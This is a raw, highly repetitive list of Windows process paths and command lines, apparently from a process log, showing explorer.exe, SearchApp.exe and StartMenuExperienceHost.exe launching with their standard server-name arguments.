"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

